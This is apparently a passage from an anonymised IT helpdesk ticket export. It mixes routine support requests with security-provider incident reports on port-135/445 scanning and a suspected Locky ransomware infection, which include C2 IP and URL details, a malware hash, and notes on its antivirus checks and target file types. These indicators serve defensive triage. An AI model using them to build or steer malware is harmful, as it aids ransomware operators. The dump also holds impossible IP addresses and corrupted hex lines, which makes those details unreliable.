==pcap 1 ascii s==_x000D_
.......w............e.....@.-..c.&amp;.d.,j..p...r....a.p.h.....http/1.1.302.moved.temporarily..server:.nginx..date:.thu,.04.aug.2016.10:59:36.gmt..content-type:.text/html..transfer-encoding:.chunked..connection:.close..location:.|12.161.199.50|2582520598|2582520598|0|1|0..set-cookie:.snkz=12.161.199.50....0...._x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000    0c00 0000 1820 a357 c7cb 0000 8201 0000    .......w........_x000D_
000010    8201 0000 4500 0182 ce82 4000 2d06 dc63    ....e.....@.-..c_x000D_
000020    c326 8964 0a2c 4ad9 0050 0e88 f172 9be0    .&amp;.d.,j..p...r.._x000D_
000030    0cc9 4106 5018 687f e100 0000 4854 5450    ..a.p.h.....http_x000D_
000040    2f31 2e31 2033 3032 204d 6f76 6564 2054    /1.1.302.moved.t_x000D_
000050    656d 706f 7261 7269 6c79 0d0a 5365 7276    emporarily..serv_x000D_
000060    6572 3a20 6e67 696e 780d 0a44 6174 653a    er:.nginx..date:_x000D_
000070    2054 6875 2c20 3034 2041 7567 2032 3031    .thu,.04.aug.201_x000D_
000080    3620 3130 3a35 393a 3336 2047 4d54 0d0a    6.10:59:36.gmt.._x000D_
000090    436f 6e74 656e 742d 5479 7065 3a20 7465    content-type:.te_x000D_
0000a0    7874 2f68 746d 6c0d 0a54 7261 6e73 6665    xt/html..transfe_x000D_
0000b0    722d 456e 636f 6469 6e67 3a20 6368 756e    r-encoding:.chun_x000D_
0000c0    6b65 640d 0a43 6f6e 6e65 6374 696f 6e3a    ked..connection:_x000D_
0000d0    2063 6c6f 7365 0d0a 4c6f 6361 7469 6f6e    .close..location_x000D_
0000e0    3a20 6874 7470 3a2f 2f73 736f 2e61 6e62    :._x000D_
0000f0    7472 2e63 6f6d 2f64 6f6d 6169 6e2f 6675    tr.com/domain/fu_x000D_
000100    7475 7265 696e 7465 7265 7374 2e6f 7267    tureinterest.org_x000D_
000110    0d0a 5365 742d 436f 6f6b 6965 3a20 6274    ..set-cookie:.bt_x000D_
000120    7374 3d66 6561 3834 3465 3066 3735 3966    st=fea844e0f759f_x000D_
000130    6430 3931 3065 3566 3865 3463 6266 3665    d0910e5f8e4cbf6e_x000D_
000140    6430 397c 3132 2e31 3631 2e31 3939 2e35    d09|12.161.199.5_x000D_
000150    307c 3134 3730 3330 3833 3736 7c31 3437    0|2582520598|147_x000D_
000160    3033 3038 3337 367c 307c 317c 300d 0a53    1419487|0|1|0..s_x000D_
000170    6574 2d43 6f6f 6b69 653a 2073 6e6b 7a3d    et-cookie:.snkz=_x000D_
000180    3132 2e31 3631 2e31 3939 2e35 300d 0a0d    12.161.199.50..._x000D_
000190    0a30 0d0a 0d0a                             .0...._x000D_
==pcap 1 hex e==</t>
  </si>
  <si>
    <t>HostName_1015: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%).</t>
  </si>
  <si>
    <t>HostName_1015: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%). out of total size 100.5 gb</t>
  </si>
  <si>
    <t>as per inc1530161::security incidents - ( in33490582 ) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17-new</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
from: gzhapcld fdigznbk _x000D_
sent: wednesday, august 10, 2016 12:28 am_x000D_
to: bev loughner; ghiklyop nikszpeu; thoyhts brthyrtiv; tiyhum kuyiomar_x000D_
cc: gdhyrts muggftyali ; qfrntose ivnhumzjalakrisyuhnyrtn; nyrjkctu tbhkenlo; ugyothfz ugrmkdhx; kathght shfhyw; suhtnhdyio psfshytd; bhayhtrathramdnty mamilujli_x000D_
subject: inc1530161::security incidents - ( in33490582 ) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17-new_x000D_
_x000D_
hello amerirtcas pc support,_x000D_
_x000D_
we have detected at least 226 occurrences of your firewall att-singapore-asa.company.com-1/54.96.80.216 dropping traffic sourcing from HostName_17-new/29.26.13.3095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have created a ticketing_tool ticket and assigned it to amerirtcas pc services. inc1530161_x000D_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=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
____________________________________________________________________________x000D_
event id: 80975479_x000D_
event summary: internal outbreak for 135/tcp_x000D_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17:48:46 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56840 dst outside:192.168.0.5/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:48:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56870 dst outside:192.168.254.16/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:48:58 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56885 dst outside:192.168.86.169/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:00 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56899 dst outside:192.168.1.70/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:03 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56924 dst outside:192.168.6.154/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:09 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56952 dst outside:192.168.54.65/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:18 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56970 dst outside:192.168.68.106/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:21 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56980 dst outside:192.168.43.240/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:29 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57000 dst outside:192.168.254.28/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57017 dst outside:192.168.1.37/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:32 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57019 dst outside:192.168.0.11/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57033 dst outside:192.168.1.105/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57035 dst outside:192.168.0.20/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57061 dst outside:192.168.1.11/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57075 dst outside:192.168.1.71/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:59 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57118 dst outside:192.168.1.139/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>client is unable to view 2 screens when tablet is docked</t>
  </si>
  <si>
    <t>clients pc is making buzzing noise and wont turn on</t>
  </si>
  <si>
    <t>activation not valid for microsoft projects</t>
  </si>
  <si>
    <t>security incidents - ( in33490582 ) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17-new</t>
  </si>
  <si>
    <t>source ip : 29.26.13.3095_x000D_
system name :HostName_17-new_x000D_
destination hostname: lmxl9516628_x000D_
device ip: 54.96.80.216_x000D_
username: ztnfhiwq njpwxmdi ibaÃ±ez_x000D_
location : mexico_x000D_
sep , sms status :no updates_x000D_
field sales user ( yes / no) :  no _x000D_
dsw event log:see below_x000D_
--------------------------------------------------------------------_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
____________________________________________________________________________x000D_
event id: 80975479_x000D_
event summary: internal outbreak for 135/tcp_x000D_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17:48:46 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56840 dst outside:192.168.0.5/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:48:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56870 dst outside:192.168.254.16/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:48:58 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56885 dst outside:192.168.86.169/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:00 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56899 dst outside:192.168.1.70/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:03 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56924 dst outside:192.168.6.154/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:09 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56952 dst outside:192.168.54.65/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:18 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56970 dst outside:192.168.68.106/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:21 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56980 dst outside:192.168.43.240/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:29 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57000 dst outside:192.168.254.28/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57017 dst outside:192.168.1.37/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:32 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57019 dst outside:192.168.0.11/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57033 dst outside:192.168.1.105/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57035 dst outside:192.168.0.20/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57061 dst outside:192.168.1.11/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57075 dst outside:192.168.1.71/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:59 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57118 dst outside:192.168.1.139/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
event id: 80975470_x000D_
event summary: internal outbreak for 445/tcp_x000D_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17:48:47 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56843 dst outside:192.168.0.5/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:48:56 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56874 dst outside:192.168.254.16/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:48:59 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56892 dst outside:192.168.86.169/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:02 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56913 dst outside:192.168.1.70/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:05 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56930 dst outside:192.168.6.154/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:11 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56958 dst outside:192.168.54.65/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:19 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56975 dst outside:192.168.68.106/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:22 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56984 dst outside:192.168.43.240/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:30 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57011 dst outside:192.168.254.28/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:33 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57026 dst outside:192.168.1.37/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:33 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57027 dst outside:192.168.0.11/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:36 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57037 dst outside:192.168.1.105/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:36 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57038 dst outside:192.168.0.20/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:52 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57066 dst outside:192.168.1.11/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:49:55 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57087 dst outside:192.168.1.71/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 3 17:50:01 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57127 dst outside:192.168.1.139/445 by access-group "acl_inside" [0x0, 0x0]</t>
  </si>
  <si>
    <t>security incidents - ( sw #in33544563 ) : possible locky ransomware infection - lpal9516827 / 45.25.35.0499</t>
  </si>
  <si>
    <t>source ip : 45.25.35.0499
system name : lpal9516827
user  name: sbinuxja vtbegcho (nicolmghyu)
location : /centralsamerirtca/south_amerirtca/fieldsales-vpn-pcs
sep , sms status : see below
field sales user ( yes / no) : no
dsw event log: see below
**
content versions
fmxcnwpu tcwrdqboinition version: 08/07/2016 r19 
sequence: 179810 
host integrity content: 10/28/2015 r1 
reputation settings: 03/02/2015 r5 
ap portal list: 11/11/2015 r22 
intrusion prevention signature: 08/05/2016 r11 
power eraser definitions: 10/28/2015 r36 
revocation content: 08/03/2016 r2 
eraser engine: 115.2.1.18 
sonar content: 07/18/2016 r1 
extended file attributes and signatures: 08/04/2016 r3 
symantec permitted applications list: 08/05/2016 r22 
**
sonar and risk logs
risk information
downloaded or created by: c:\programdnty files (x86)\java\jre1.8.0_101\bin\javaw.exe 
file or path: c:\users\nicolmghyu\202b4bcc-bddb48f94-1\9940ef2a-b.exe   
application: 9940ef2a-b.exe 
application type: not applicable 
category set: malware 
category type: heuristic virus 
version: 1.0.0.0 
file size: 3332167 
hash: 1c9fca98197534681661982b366668541fa6f8d5f6480a64ffddfee7fbf502d5 
hash algorithm: sha-256 
risk reputation
first seen: symantec has known about this file approximately 2 days. 
reputation: this file is untrustworthy. 
prevalence: this file has been seen by fewer than 5 symantec users. 
sonar risk level: high 
sensitivity:  1 (low) 
detection score: 1 
sonar engine version: 10.1.0.96 
submit: not recommended to submit 
**
=========================
incident overview
=========================
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
the outbound http traffic from the infected device contained the following method data:
protocol: tcp
http method: post
http version: http/1.0
domain: 81.4.108.247
url path: /comercial/cadastra.php
user-agent: mozilla/5.0 (compatible; msie 6.0; windows nt 5.1; sv2)
content length: 127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
1) ticket only escalation for related events (medium priority ticket and an e-mail only notification).
2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal).
sincerely,
secureworks ctoc
=========================
technical details
=========================
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"inwarehouse_tool_j-". a potential victim receiving the attachment needs to open it and enable the macro which will then initiate the payload download over http.
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locky also checks for the following registry keys, which may indicate the presence of security-related software:
â€¢ software\kasperskylab
â€¢ software\eset
â€¢ software\avast software
the victim is notified of the infection when the desktop background image changes (see figure 4 in ctu tips). locky places the same instructions in a text file and a bitmap image on the desktop and displays both of these files to the victim.
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
locky may also have the capability to locate network resources and encrypt files in those locations. ctu researchers are analysing a block of code that may be used to enumerate network-based locations (2016-02-19).
locky attempts encryption on the following files and file types:
.qcow2
.vmdk
.tar
.bz2
.jpeg
.sqlite3
.ppsm
.potm
.xlsx
.docm
wallet.dat
.xlsm
.xlsb
.dotm
.dotx
.docx 
.djvu
.pptx
.pptm
.xltx 
.xltm
.ppsx
.ppam
.docb
.potx
.lay6
.mSID_33
.sldm
.sldx
.tiff
.class
.java 
.sqlitedb
=========================
references
========================= 
=========================
event data
=========================
event id: 304325068
event summary: 52655 vid74472 locky ransomware c2 communication outbound
occurrence count: 1
event count: 1
host and connection information
source ip: 45.25.35.0499
source hostname: lpal9516827
source port: 65360
destination ip: 81.4.108.247
destination hostname: ha6.ru.
destination port: 80
destination ip geolocation: geffen, nld
connection directionality: outgoing
http method: post
user agent: mozilla/5.0 (compatible; msie 6.0; windows nt 5.1; sv2)
host: 81.4.108.247
full url path: /comercial/cadastra.php
device information
device ip: 10.32.100.17
device name: isensor03.company.com
log time: 2016-08-08 at 18:49:36 utc
action: not blocked
vendor eventid: 349194
cvss score: -1 
vendor priority: 1
vendor version: 7
scwx event processing information
sherlock rule id (sle): 2114736
inspector rule id: 277082
inspector event id: 031975724
ontology id: 200020003203758352
event type id: 200020003203696566
agent id: 102805
event detail:
[**] [1:21163766:6] 52655 vid74472 locky ransomware c2 communication outbound [**]
[classification: none] [priority: 1] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]
[sensor id: 602982][event id: 349194][time: 2581793287.437864]
[src ip: 45.25.35.0499][dst ip: 81.4.108.247][sport/itype: 65360][dport/icode: 80][proto: 6]
08/08/2016-18:49:36.437864 45.25.35.0499:65360 -&gt; 81.4.108.247:80
tcp ttl:124 tos:0x0 id:10107 iplen:20 dgmlen:408 df
***ap*** seq: 0x85a5dbff  ack: 0xb770f7f2  win: 0x102  tcplen: 20
==pcap 1==
[ex http_uri 9: /comercial/cadastra.php]
[ex http_hostname 10: 81.4.108.247]
[o:security]
ascii packet(s):
==pcap 1 ascii s==
....@..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
==pcap 1 ascii e==
hex packet(s):
==pcap 1 hex s==
000000    0c00 0000 40d4 a857 68ae 0600 9801 0000    ....@..wh.......
000010    9801 0000 4500 0198 277b 4000 7c06 c31e    ....e...'{@.|...
000020    0a2c 4a9f 5104 6cf7 ff50 0050 85a5 dbff    .,j.q.l..p.p....
000030    b770 f7f2 5018 0102 93f3 0000 504f 5354    .p..p.......post
000040    202f 434f 4d45 5243 4941 4c2f 6361 6461    ./comercial/cada
000050    7374 7261 2e70 6870 2048 5454 502f 312e    stra.php.http/1.
000060    300d 0a48 6f73 743a 2038 312e 342e 3130    0..host:.81.4.10
000070    382e 3234 370d 0a4b 6565 702d 416c 6976    8.247..keep-aliv
000080    653a 2033 3030 0d0a 436f 6e6e 6563 7469    e:.300..connecti
000090    6f6e 3a20 6b65 6570 2SID_26 6c69 7665 0d0a    on:.keep-alive..
0000a0    5573 6572 2SID_29 6765 6e74 3a20 4d6f 7a69    user-agent:.mozi
0000b0    6c6c 612f 352e 3020 2863 6f6d 7061 7469    lla/5.0.(compati
0000c0    626c 653b 204d 5349 4520 362e 303b 2057    ble;.msie.6.0;.w
0000d0    696e 646f 7773 204e 5420 352e 313b 2053    indows.nt.5.1;.s
0000e0    5632 290d 0a43 6f6e 7465 6e74 2d54 7970    v2)..content-typ
0000f0    653a 2061 7070 6c69 6361 7469 6f6e 2f78    e:.application/x
000100    2d77 7777 2d66 6f72 6d2d 7572 6c65 6e63    -www-form-urlenc
000110    6f64 6564 0d0a 436f 6e74 656e 742d 4c65    oded..content-le
000120    6e67 7468 3a20 3132 370d 0a0d 0a4e 4f4d    ngth:.127....nom
000130    453d 4c50 414c 3834 3035 3731 3626 534f    e=lpal9516827&amp;so
000140    3d57 494e 3130 2644 4154 413d 3038 2f30    =win10&amp;data=08/0
000150    382f 3230 3136 2031 353a 3439 3a33 3626    8/2016.15:49:36&amp;
000160    5653 3d39 2649 4449 4f4d 413d 506f 7274    vs=9&amp;idioma=port
000170    7567 75ea 7320 2842 7261 7369 6c29 2641    ugu.s.(south_amerirtca)&amp;a
000180    4e54 493d 7b57 494e 444f 5753 7d20 2650    nti={windows}.&amp;p
000190    4c55 4749 4e3d 2d49 5426 4944 4358 3d43    lugin=-it&amp;idcx=c
0001a0    584c 5b30 322d 3038 2d31 365d              xl[02-08-16]
==pcap 1 hex e==</t>
  </si>
  <si>
    <t>unable to connect with vpn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ivohcdpw.ixcanwbm@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
i am trying to connect with virtual private network through _x000D_
_x000D_
please do the need full . tomorrow at 1400 hrs i will be free  by 0900hrs to 1330hrs i will be inside govt. factory and laptop and mobile is not allowed ._x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>xceliron process not working - inwarehouse_tools are blocking due to missing goods receipt.</t>
  </si>
  <si>
    <t>xceliron process not working - inwarehouse_tools are blocking due to missing goods receipt. vendor is routinely not getting paid because of no goods receipt.  asuenpyg vzmneycx created process whereby the goods receipts were to be done via the system.  this process is not working.</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bkbackup_tool_HostName_770_prod_inc</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bkbackup_tool_HostName_770_prod_inc at 08/09/16 12:56:26</t>
  </si>
  <si>
    <t>lhqw8325925sf: usa-nologin-collaboration_platform: script returned unexpected value 3.</t>
  </si>
  <si>
    <t xml:space="preserve">lhqw8325925sf: usa-nologin-collaboration_platform: script returned unexpected value 3. </t>
  </si>
  <si>
    <t>source ip : 45.25.35.0499_x000D_
system name : lpal9516827_x000D_
user  name: sbinuxja vtbegcho (nicolmghyu)_x000D_
location : /centralsamerirtca/south_amerirtca/fieldsales-vpn-pcs_x000D_
sep , sms status : see below_x000D_
field sales user ( yes / no) : no_x000D_
dsw event log: see below_x000D_
_x000D_
**_x000D_
_x000D_
content versions_x000D_
fmxcnwpu tcwrdqboinition version: 08/07/2016 r19 _x000D_
sequence: 179810 _x000D_
host integrity content: 10/28/2015 r1 _x000D_
reputation settings: 03/02/2015 r5 _x000D_
ap portal list: 11/11/2015 r22 _x000D_
intrusion prevention signature: 08/05/2016 r11 _x000D_
power eraser definitions: 10/28/2015 r36 _x000D_
revocation content: 08/03/2016 r2 _x000D_
eraser engine: 115.2.1.18 _x000D_
sonar content: 07/18/2016 r1 _x000D_
extended file attributes and signatures: 08/04/2016 r3 _x000D_
symantec permitted applications list: 08/05/2016 r22 _x000D_
_x000D_
**_x000D_
_x000D_
sonar and risk logs_x000D_
_x000D_
risk information_x000D_
downloaded or created by: c:\programdnty files (x86)\java\jre1.8.0_101\bin\javaw.exe _x000D_
file or path: c:\users\nicolmghyu\202b4bcc-bddb48f94-1\9940ef2a-b.exe   _x000D_
application: 9940ef2a-b.exe _x000D_
application type: not applicable _x000D_
category set: malware _x000D_
category type: heuristic virus _x000D_
version: 1.0.0.0 _x000D_
file size: 3332167 _x000D_
hash: 1c9fca98197534681661982b366668541fa6f8d5f6480a64ffddfee7fbf502d5 _x000D_
hash algorithm: sha-256 _x000D_
_x000D_
risk reputation_x000D_
first seen: symantec has known about this file approximately 2 days. _x000D_
reputation: this file is untrustworthy. _x000D_
prevalence: this file has been seen by fewer than 5 symantec users. _x000D_
sonar risk level: high _x000D_
sensitivity:  1 (low) _x000D_
detection score: 1 _x000D_
sonar engine version: 10.1.0.96 _x000D_
submit: not recommended to submit _x000D_
_x000D_
**_x000D_
_x000D_
=========================_x000D_
incident overview_x000D_
=========================_x000D_
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ransomware._x000D_
_x000D_
_x000D_
the outbound http traffic from the infected device contained the following method data:_x000D_
protocol: tcp_x000D_
http method: post_x000D_
http version: http/1.0_x000D_
domain: 81.4.108.247_x000D_
url path: /comercial/cadastra.php_x000D_
user-agent: mozilla/5.0 (compatible; msie 6.0; windows nt 5.1; sv2)_x000D_
content length: 127_x000D_
_x000D_
_x000D_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._x000D_
1) ticket only escalation for related events (medium priority ticket and an e-mail only notification)._x000D_
2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal)._x000D_
_x000D_
sincerely,_x000D_
secureworks ctoc_x000D_
_x000D_
_x000D_
=========================_x000D_
technical details_x000D_
=========================_x000D_
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"inwarehouse_tool_j-". a potential victim receiving the attachment needs to open it and enable the macro which will then initiate the payload download over http._x000D_
_x000D_
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_x000D_
_x000D_
locky also checks for the following registry keys, which may indicate the presence of security-related software:_x000D_
â€¢ software\kasperskylab_x000D_
â€¢ software\eset_x000D_
â€¢ software\avast software_x000D_
_x000D_
the victim is notified of the infection when the desktop background image changes (see figure 4 in ctu tips). locky places the same instructions in a text file and a bitmap image on the desktop and displays both of these files to the victim._x000D_
_x000D_
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times._x000D_
_x000D_
locky may also have the capability to locate network resources and encrypt files in those locations. ctu researchers are analysing a block of code that may be used to enumerate network-based locations (2016-02-19)._x000D_
_x000D_
locky attempts encryption on the following files and file types:_x000D_
   _x000D_
.qcow2_x000D_
.vmdk_x000D_
.tar_x000D_
.bz2_x000D_
.jpeg_x000D_
.sqlite3_x000D_
.ppsm_x000D_
.potm_x000D_
.xlsx_x000D_
.docm_x000D_
wallet.dat_x000D_
.xlsm_x000D_
.xlsb_x000D_
.dotm_x000D_
.dotx_x000D_
.docx _x000D_
.djvu_x000D_
.pptx_x000D_
.pptm_x000D_
.xltx _x000D_
.xltm_x000D_
.ppsx_x000D_
.ppam_x000D_
.docb_x000D_
.potx_x000D_
.lay6_x000D_
.mSID_33_x000D_
.sldm_x000D_
.sldx_x000D_
.tiff_x000D_
.class_x000D_
.java _x000D_
.sqlitedb_x000D_
_x000D_
_x000D_
=========================_x000D_
references_x000D_
========================= _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
_x000D_
event id: 304325068_x000D_
event summary: 52655 vid74472 locky ransomware c2 communication outbound_x000D_
occurrence count: 1_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 45.25.35.0499_x000D_
source hostname: lpal9516827_x000D_
source port: 65360_x000D_
destination ip: 81.4.108.247_x000D_
destination hostname: ha6.ru._x000D_
destination port: 80_x000D_
destination ip geolocation: geffen, nld_x000D_
connection directionality: outgoing_x000D_
http method: post_x000D_
user agent: mozilla/5.0 (compatible; msie 6.0; windows nt 5.1; sv2)_x000D_
host: 81.4.108.247_x000D_
full url path: /comercial/cadastra.php_x000D_
_x000D_
device information_x000D_
device ip: 10.32.100.17_x000D_
device name: isensor03.company.com_x000D_
log time: 2016-08-08 at 18:49:36 utc_x000D_
action: not blocked_x000D_
vendor eventid: 349194_x000D_
cvss score: -1 _x000D_
vendor priority: 1_x000D_
vendor version: 7_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 2114736_x000D_
inspector rule id: 277082_x000D_
inspector event id: 031975724_x000D_
ontology id: 200020003203758352_x000D_
event type id: 200020003203696566_x000D_
agent id: 102805_x000D_
_x000D_
event detail:_x000D_
[**] [1:21163766:6] 52655 vid74472 locky ransomware c2 communication outbound [**]_x000D_
[classification: none] [priority: 1] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 602982][event id: 349194][time: 2581793287.437864]_x000D_
[src ip: 45.25.35.0499][dst ip: 81.4.108.247][sport/itype: 65360][dport/icode: 80][proto: 6]_x000D_
08/08/2016-18:49:36.437864 45.25.35.0499:65360 -&gt; 81.4.108.247:80_x000D_
tcp ttl:124 tos:0x0 id:10107 iplen:20 dgmlen:408 df_x000D_
***ap*** seq: 0x85a5dbff  ack: 0xb770f7f2  win: 0x102  tcplen: 20_x000D_
==pcap 1==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /comercial/cadastra.php]_x000D_
_x000D_
[ex http_hostname 10: 81.4.108.247]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
ascii packet(s):_x000D_
==pcap 1 ascii s==_x000D_
....@..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_x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000    0c00 0000 40d4 a857 68ae 0600 9801 0000    ....@..wh......._x000D_
000010    9801 0000 4500 0198 277b 4000 7c06 c31e    ....e...'{@.|..._x000D_
000020    0a2c 4a9f 5104 6cf7 ff50 0050 85a5 dbff    .,j.q.l..p.p...._x000D_
000030    b770 f7f2 5018 0102 93f3 0000 504f 5354    .p..p.......post_x000D_
000040    202f 434f 4d45 5243 4941 4c2f 6361 6461    ./comercial/cada_x000D_
000050    7374 7261 2e70 6870 2048 5454 502f 312e    stra.php.http/1._x000D_
000060    300d 0a48 6f73 743a 2038 312e 342e 3130    0..host:.81.4.10_x000D_
000070    382e 3234 370d 0a4b 6565 702d 416c 6976    8.247..keep-aliv_x000D_
000080    653a 2033 3030 0d0a 436f 6e6e 6563 7469    e:.300..connecti_x000D_
000090    6f6e 3a20 6b65 6570 2SID_26 6c69 7665 0d0a    on:.keep-alive.._x000D_
